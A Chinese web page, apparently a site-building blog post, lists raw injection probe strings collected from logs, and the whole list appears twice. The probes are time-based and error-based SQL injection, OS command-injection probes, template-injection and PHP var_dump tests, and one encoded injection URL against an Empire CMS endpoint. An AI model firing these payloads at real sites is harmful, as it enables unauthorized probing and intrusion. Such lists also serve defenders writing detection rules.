大量SQL数据注入的样本
时间:2023年07月10日
/来源:网络
/编辑:佚名
大量SQL数据注入的样本:
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s
admin'and(select+1)>0waitfor/**/delay'0:0:0
admin'/**/and(select'1'from/**/pg_sleep(0))>'0
admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="
admin'and(select*from(select+sleep(3))a/**/union/**/select+1)='
admin'and'c'='c
admin'"\(
admin鎈'"\(
expr 806611221 + 997466205
admin&set /A 911413438+906089431
admin$(expr 962935251 + 929380135)
admin|expr 930840201 + 873592254
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1451267485')))
admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1199487333')))>'0
admin expr 983037841 + 840750877
admin'and(select'1'from/**/cast(md5(1580157050)as/**/int))>'0
extractvalue(1,concat(char(126),md5(1301020577)))
admin"and/**/extractvalue(1,concat(char(126),md5(1922575879)))and"
admin'and/**/extractvalue(1,concat(char(126),md5(1634038968)))and'
<%- 988389609+885309036 %>
#set($c=884874869+877967656)${c}$c
${987581318+821613195}
/*1*/{{894643765+956323033}}
'-var_dump(md5(572828254))-'
oyrmiljureqiplwuafks
%{41744*44696}
'+(40086*41722)+'
帝国cms一个sql注入样本
/e/public/ViewClick/?addclick=1&classid=4%27and%28select%271%27from%2F%2A%2A%2Fcast%28md5%281279553492%29as%2F%2A%2A%2Fint%29%29%3E%270&id=3310
classid=4‘and(select‘1‘from/**/cast(md5(1279553492)as/**/int))>‘0
收集的一个样本
testexpr 887306474 + 868862857 2021-01
rzkurpwfldlgoxnybnns 2020-11
test|expr 945210590 + 983331837 2021-01
11223344 05-12
test&set /A 814007678+908014825 04-23
${@var_dump(md5(146397212))}; 2022-05
'-var_dump(md5(712529590))-' 2020-11
/*1*/{{898763864+923112588}} 2020-11
${971238291+890944732} 2020-11
${(945011103+853813342)?c} 2020-11
#set($c=852319068+937579173)${c}$c 2020-11
<%- 947715750+965283888 %> 2020-11
test'and/**/extractvalue(1,concat(char(126),md5(1259294924)))and' 2020-11
test"and/**/extractvalue(1,concat(char(126),md5(1863865727)))and" 2020-11
extractvalue(1,concat(char(126),md5(1837116390))) 2020-11
test'and(select'1'from/**/cast(md5(1769753354)as/**/int))>'0 2020-11
test/**/and/**/cast(md5('1917649626')as/**/int)>0 2020-11
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1851702917'))) 2020-11
test'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1759338214')))>'0 2020-11
test鎈'"\( 2020-11
test'"\( 2020-11
test'and'x'='x 2020-11
test'and'g'='n 2020-11
test"and"s"="s 2020-11
test"and"n"="e 2020-11
test'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 2020-11
test'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 2020-11
test"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 2020-11
test"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 2020-11
test'/**/and(select'1'from/**/pg_sleep(0))>'0 2020-11
test'/**/and(select'1'from/**/pg_sleep(2))>'0 2020-11
test'and(select+1)>0waitfor/**/delay'0:0:0 2020-11
test'and(select+1)>0waitfor/**/delay'0:0:2 2020-11
test'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s 2020-11
test'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',2)='z 2020-11
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s
admin'and(select+1)>0waitfor/**/delay'0:0:0
admin'/**/and(select'1'from/**/pg_sleep(0))>'0
admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="
admin'and(select*from(select+sleep(3))a/**/union/**/select+1)='
admin'and'c'='c
admin'"\(
admin鎈'"\(
expr 806611221 + 997466205
admin&set /A 911413438+906089431
admin$(expr 962935251 + 929380135)
admin|expr 930840201 + 873592254
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1451267485')))
admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1199487333')))>'0
admin expr 983037841 + 840750877
admin'and(select'1'from/**/cast(md5(1580157050)as/**/int))>'0
extractvalue(1,concat(char(126),md5(1301020577)))
admin"and/**/extractvalue(1,concat(char(126),md5(1922575879)))and"
admin'and/**/extractvalue(1,concat(char(126),md5(1634038968)))and'
<%- 988389609+885309036 %>
#set($c=884874869+877967656)${c}$c
${987581318+821613195}
/*1*/{{894643765+956323033}}
'-var_dump(md5(572828254))-'
oyrmiljureqiplwuafks
%{41744*44696}
'+(40086*41722)+'
帝国cms一个sql注入样本
/e/public/ViewClick/?addclick=1&classid=4%27and%28select%271%27from%2F%2A%2A%2Fcast%28md5%281279553492%29as%2F%2A%2A%2Fint%29%29%3E%270&id=3310
classid=4‘and(select‘1‘from/**/cast(md5(1279553492)as/**/int))>‘0
收集的一个样本
testexpr 887306474 + 868862857 2021-01
rzkurpwfldlgoxnybnns 2020-11
test|expr 945210590 + 983331837 2021-01
11223344 05-12
test&set /A 814007678+908014825 04-23
${@var_dump(md5(146397212))}; 2022-05
'-var_dump(md5(712529590))-' 2020-11
/*1*/{{898763864+923112588}} 2020-11
${971238291+890944732} 2020-11
${(945011103+853813342)?c} 2020-11
#set($c=852319068+937579173)${c}$c 2020-11
<%- 947715750+965283888 %> 2020-11
test'and/**/extractvalue(1,concat(char(126),md5(1259294924)))and' 2020-11
test"and/**/extractvalue(1,concat(char(126),md5(1863865727)))and" 2020-11
extractvalue(1,concat(char(126),md5(1837116390))) 2020-11
test'and(select'1'from/**/cast(md5(1769753354)as/**/int))>'0 2020-11
test/**/and/**/cast(md5('1917649626')as/**/int)>0 2020-11
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1851702917'))) 2020-11
test'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1759338214')))>'0 2020-11
test鎈'"\( 2020-11
test'"\( 2020-11
test'and'x'='x 2020-11
test'and'g'='n 2020-11
test"and"s"="s 2020-11
test"and"n"="e 2020-11
test'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 2020-11
test'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 2020-11
test"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 2020-11
test"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 2020-11
test'/**/and(select'1'from/**/pg_sleep(0))>'0 2020-11
test'/**/and(select'1'from/**/pg_sleep(2))>'0 2020-11
test'and(select+1)>0waitfor/**/delay'0:0:0 2020-11
test'and(select+1)>0waitfor/**/delay'0:0:2 2020-11
test'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s 2020-11
test'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',2)='z 2020-11
新闻资讯 更多
- 【建站知识】查询nginx日志状态码大于400的请求并打印整行04-03
- 【建站知识】Python中的logger和handler到底是个什么?04-03
- 【建站知识】python3拉勾网爬虫之(您操作太频繁,请稍后访问)04-03
- 【建站知识】xpath 获取meta里的keywords及description的方法04-03
- 【建站知识】python向上取整以50为界04-03
- 【建站知识】scrapy xpath遇见乱码解决04-03
- 【建站知识】scrapy爬取后中文乱码,解决word转为html 时cp1252编码问题04-03
- 【建站知识】scrapy采集—爬取中文乱码,gb2312转为utf-804-03
猜你需要
豫ICP备2021026617号-1
豫公网安备:41172602000185